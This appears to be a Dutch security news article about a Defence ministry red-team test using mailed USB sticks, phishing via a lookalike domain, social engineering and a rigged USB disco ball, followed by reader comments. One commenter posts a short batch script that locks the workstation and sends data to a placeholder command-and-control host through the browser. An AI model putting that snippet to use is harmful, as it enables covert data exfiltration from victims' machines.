image

Defensie test personeel met 'spionage-discobal'

donderdag 4 april 2013, 11:53 door Redactie, 8 reacties

Verschillende Defensiemedewerkers ontvingen de afgelopen weken USB-sticks met de opdracht die op meerdere werkplekken binnen de Rijksoverheid aan te sluiten. Ook werden er verschillende phishingmails
ontdekt die Defensiepersoneel vroegen om op een nagemaakte Defensiesite in te loggen. Een geraffineerde aanval door een buitenlandse mogendheid? Nee, ondanks de waarschuwing op het intranet van Defensie die sommige werknemers deed vermoeden dat het om een echte aanval ging, bleek het een zogeheten 'Red Team' test te zijn.

Via de test wilde Defensie kijken hoe kwetsbaar de organisatie voor spionageaanvallen is. Daarbij werden in totaal zeven scenario’s bedacht, zo laat luitenant-kolonel Hans Edelhausen tegenover Security.NL weten. Edelhausen werkt bij de afdeling Beveiligingsautoriteit van Defensie. Hij bedacht het project, dat onderdeel van het Rijksbrede onderzoek KWAS is, wat staat voor Kwetsbaarheidsanalyse Spionage.

“We wilden ook een keer gaan kijken hoe het met de beveiliging ervoor stond”, merkt Edelhausen op. “Dat was de context voor deze Red Team test.” Uniek aan deze test was dat slechts twee mensen binnen Defensie hiervan op de hoogte waren. “Dat is al uniek, want dit soort activiteiten doen wij periodiek zelf, maar er zijn altijd meer mensen bij betrokken. Het moest een realistische test zijn.” Ook vanuit Justitie was de voorwaarde gesteld dat zo weinig mogelijk mensen van de test afwisten.

Scenario’s
De test bestond in totaal uit 7 scenario’s die over een periode van drie maanden werden uitgewerkt. Het ging om een aanval via per post verstuurde USB-sticks, social engineering per telefoon, een phishingmail gekoppeld aan een nepsite, footprinting van netwerken, netwerkhacking, een fysieke beveiligingstest met een mystery guest en als uitsmijter een gecompromitteerde discobal.

Het betrof een volledig functionerende USB-discobal die was gemanipuleerd en van extra onderdelen voorzien. Die onderdelen startten een sessie zodra het apparaat op de computer werd aangesloten.

Bij het kiezen van de scenario’s werd gekeken hoe potentiële spionnen te werk zouden kunnen gaan. Hoewel er aanvallen via USB-sticks bekend zijn, hebben deze zover Edelhausen weet nog niet in het echt tegen Defensie plaatsgevonden.

Een ander uniek kenmerk van de test was dat een aantal scenario’s tegelijkertijd werd uitgevoerd, om te zien hoe de organisatie hierop reageerde. “We wilden ook de reactietijd van de hele organisatie testen als er verschillende aanvallen plaatsvinden. Dat is op deze wijze en schaal nog nooit getest.”

Voor de phishingsite werd de nepsite rijksauditdiensten.nl geregistreerd, terwijl de echte website op auditdienst.nl te vinden is. Hier werd werknemers gevraagd om met de gegevens voor de MULAN-omgeving (Mijn Uniforme Logische Aansluiting op het Net) in te loggen. Dit is de standaard ICT-werkomgeving van Defensie.

Door de aanvallers opgezette phishingsite

Resultaat
De Red Team test vond in maart plaats en zou drie weken doorlopen, tenzij de doelstelling werd gehaald. De doestelling moest laten zien hoe weerbaar Defensie tegen spionagebedreigingen is. En daar lijkt het goed mee te zitten, aangezien de test voortijdig werd gestaakt. Hoewel de uiteindelijke resultaten nog niet binnen zijn, is Edelhausen positief. Zoals het er nu naar uitziet wisten de aanvallers geen enkel werkstation te compromitteren of medewerker te social engineeren.

Edelhausen schrijft het succes van de verdedigers onder andere toe aan de awarenesstrainingen die personeel moeten volgen. Alle verstuurde USB-sticks werden netjes door de aangeschreven medewerkers bij de lokale veiligheidsfunctionaris ingeleverd. Voor de ‘aangevallen’ werknemers was het de eerste keer dat ze met een geprepareerde USB-stick te maken kregen. “Phishing kenden ze al van thuis, maar een USB-stick was een geheel nieuw facet voor deze mensen”, stelt Edelhausen.

Bij het social engineering scenario werden mensen op hun werkadres gebeld en werd er geprobeerd gevoelige informatie te ontfutselen. Iets wat de social engineers niet lukte. Soms ook omdat Defensiepersoneel vergat terug te bellen. “Er zijn geen medewerkers geweest die privacygevoelige informatie over collega’s hebben verstrekt.”

Defensiemedewerkers hebben de mogelijkheid een e-learning module te volgen waar verschillende dreigingen aan bod komen, waaronder cyber. “Daarom zijn alle scenario’s ook niet gelukt, omdat de awareness bij de mensen goed werkte.”

Toch zijn er ook verbeterpunten, zoals de logistiek en communicatie tussen betrokkenen. Het gaat dan om het overbrengen van de verdachte apparatuur naar de CERT van Defensie voor verder onderzoek. Daarnaast is er ook nog ruimte om de procedures aan te scherpen, bijvoorbeeld bij het bepalen van prioriteiten als er meerdere aanvallen tegelijkertijd plaatsvinden.

Uiteindelijk verscheen er op het Intranet van Defensie een waarschuwing dat er aanvallen plaatsvonden. Een medewerker van Defensie tipte vervolgens Security.NL dat er aanvallen gaande waren. Zowel deze werknemer als de werknemer die het bericht op Intranet had geplaatst wisten niet dat het om een Red Team test ging.

Aanvallers
De test werd door mensen buiten Defensie uitgevoerd, wat betekende dat de ‘aanvallers’ alleen over basisinformatie beschikten. De test moest namelijk zo realistisch mogelijk zijn. “Ze wisten niet precies hoe ons netwerk eruitziet”, laat Edelhausen weten.

Dat had bijvoorbeeld gevolgen voor de test met de USB-sticks. Die gebruikten Autorun en PuTTy om via een bepaalde poort een verbinding naar een zogenaamd kwaadaardige website op te zetten. "Maar of bij Defensie de poorten open of dicht zijn weten de kwaadwillenden van buiten niet.”

Discobal
Aangezien de doelstelling voortijdig werd gehaald was het niet meer nodig om de discobal in te zetten. In totaal werden er vier USB-sticks en vier USB-discoballen gemaakt. De USB-sticks werden naar specifiek uitgezochte Defensiemedewerkers gestuurd. De USB-discobal was volgens Edelhausen ideaal voor een gerichte aanval.

“Ik hem zelf op een testlaptop aangesloten. Hij draait en geeft licht, dat is de afleiding, maar je ziet dus niet dat er een sessie in de achtergrond wordt opgebouwd. Een heel gemeen ding, een ideale backdoor dus.”

De discobal,verpakking en brief die naar personeel zou worden gestuurd
Reacties (8)
04-04-2013, 13:20 door Whireking
"Aangezien de doelstelling voortijdig werd gehaald was het niet meer nodig om de discobal in te zetten."
Is dat niet het zelfde zeggen als: "We stoppen de voetbalwedstrijd in de 80ste minuut, want team A staat toch met 5-0 voor"?
Terwijl Team B dan net zijn topscoorder in wil brengen die wel eens vaker 6 goals in 10 minuten maakt.

Als die discobal zo goed bedacht was, dan wil je die juist toch wel testen?
Volgens mij hebben ze gewoon afgekapt zodat ze nu kunnen zeggen dat de aanval niet geslaagd is. En zo te horen was de aanval wel gelukt als de discobal uitgeprobeerd was.

Edit:
"Via de test wilde Defensie kijken hoe kwetsbaar de organisatie voor spionageaanvallen is."
Dat is de doelstelling. Hoe kunnen ze die aan getoond hebben als ze niet alles geprobeerd hebben wat ze konden proberen?
04-04-2013, 14:06 door lucb1e
Door Redactie: "Maar of bij Defensie de poorten open of dicht zijn weten de kwaadwillenden van buiten niet.”
Niet nodig, let op:
REM Usage: data-upload.bat "%u0430%u0437%20%u0431%u0443%u043A%u0438%20%u0432%u0435%u0434%u0438"
REM Workstation locken, geeft je minimaal een paar seconden om te doen wat je wil
rundll32.exe user32.dll,LockWorkStation
REM data export!
start "" "%programfiles%\internet explorer\iexplore" "http://cnc.example.com/?%1"
REM wachten op pageload
ping localhost -n 4
REM en weer opruimen
taskkill /IM "iexplore.exe"


Misschien wat verdacht dat het werkstation zich op een willekeurig moment lockt, maar opzich zie je niks wat je niet elke dag ziet. En met iets meer werk kun je gewoon een geplande taak aanmaken die runt bij het locken, of wanneer een screensaver actief wordt ofzo. En je kan uit het register halen wat de standaardbrowser is (daarom gebruik ik niet "start http://url", dan weet je niet welke browser je moet killen).


Door Whireking:
Is dat niet het zelfde zeggen als: "We stoppen de voetbalwedstrijd in de 80ste minuut, want team A staat toch met 5-0 voor"?
Ja, en ik vind het ook compleet logisch omdat de kans zo klein is dat ze die achterstand nog inhalen in slechts 11% (10/90) van de tijd terwijl ze op dit moment worden ingemaakt met 5-0. Ik heb nog nooit een radioreporter horen roepen "Ze liggen met 5-0 achter in de 80ste minuut, maar wie weet maken ze een grandioze comeback!" Daarnaast is het in het geval van de defensietest zo dat op een gegeven moment (indien alles gaat zoals het zou moeten) iedereen weet dat ze aangevallen worden en het geen nut heeft om op dat moment nog door te gaan (wanneer iedereen het verwacht).

Door Whireking: Volgens mij hebben ze gewoon afgekapt zodat ze nu kunnen zeggen dat de aanval niet geslaagd is.
Kritisch zijn is goed, maar dit neigt gewoon meer naar cynisch...
04-04-2013, 14:47 door Dystopia
Leuke test maar helaas niet meer in lijn met de gebruikte technieken van vandaag de dag. Waar user interactie feitelijk niet noodzakelijk is. Die tijden zijn voorbij. Het is en blijft een leuke politieke mooi weer show maar ingewijden in de werkelijke wereld van cyberespionage weten wel beter dan de hier gebruikte technieken. Leuk voor de politiek en de bobo's maar de test heeft verder weinig van doen met hoe tegenwoordig daadwerkelijk high tech espionage wordt bedreven.

My two cents.
04-04-2013, 14:54 door lucb1e
Door Utopia: Leuke test maar helaas niet meer in lijn met de gebruikte technieken van vandaag de dag. Waar user interactie feitelijk niet noodzakelijk is. Die tijden zijn voorbij. Het is en blijft een leuke politieke mooi weer show maar ingewijden in de werkelijke wereld van cyberespionage weten wel beter dan de hier gebruikte technieken.
Statements zonder argumenten of enige andere vorm van bewijs zijn ook zo nuttig. Wat voor andere technieken?
05-04-2013, 08:58 door yobi
Kwetsbaarheden aantonen met een Red Team actie vind ik een goede zaak.

Iedereen kan in een val trappen. Ik pleit dan ook altijd voor schadebeperkende maatregelen. Waarom mail openen met een (domain-)admin account? Waarom overal hetzelfde wachtwoord (thuis en op het werk)? Waarom vragen ze deze informatie aan de telefoon? enz... De mens blijft in mijn optiek de zwakste schakel.

Mijn mening is dan ook, dat er beter geïnvesteerd kan worden in het opvoeden van de gebruikers, dan in het investeren in dure apparatuur.

Ook open communicatie ipv een afrekencultuur is denk ik belangrijk. Als iemand ergens is ingetrapt, dan gelijk melden ipv onder de pet houden. Men kan er dan gelijk op acteren.
09-04-2013, 08:08 door SimonS
De mens is vaak inderdaad de zwakste schakel. Ik ben toch benieuwd hoe de discobal het had gedaan. Dat lijkt nou net zo'n hebbedingetje waar niemand over nadenkt en gewoon aansluit.
23-04-2013, 11:19 door Anoniem
De vergelijking met de voetbalwedstrijd lijkt me wat onzinnig. Als de tegenstander scoort dan is het voldoende om zelf ook weer te scoren en de stand is weer gelijk.

Maar bij beveiliging hoeft de tegenstander maar één keer te scoren en jij moet ALLE aanvallen af weten te weren, anders is hij binnen en is het gebeurd met je. Dus is het wel jammer dat ze voortijdig gestopt zijn (maar misschien was het geld of de tijd op).
Ik sluit me toch aan bij het vermoeden van Whiteking.
Al blijft het zo dat je nooit uitputtend kunt testen, maar alles uit de kast halen wat je hebt liggen is toch wel het minste.
24-05-2013, 09:46 door Anoniem
Door lucb1e:
Door Utopia: Leuke test maar helaas niet meer in lijn met de gebruikte technieken van vandaag de dag. Waar user interactie feitelijk niet noodzakelijk is. Die tijden zijn voorbij. Het is en blijft een leuke politieke mooi weer show maar ingewijden in de werkelijke wereld van cyberespionage weten wel beter dan de hier gebruikte technieken.
Statements zonder argumenten of enige andere vorm van bewijs zijn ook zo nuttig. Wat voor andere technieken?

Beste lucb1e,

Dat is nou juist de grap...Die worden niet gepost of fora zoals deze...
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.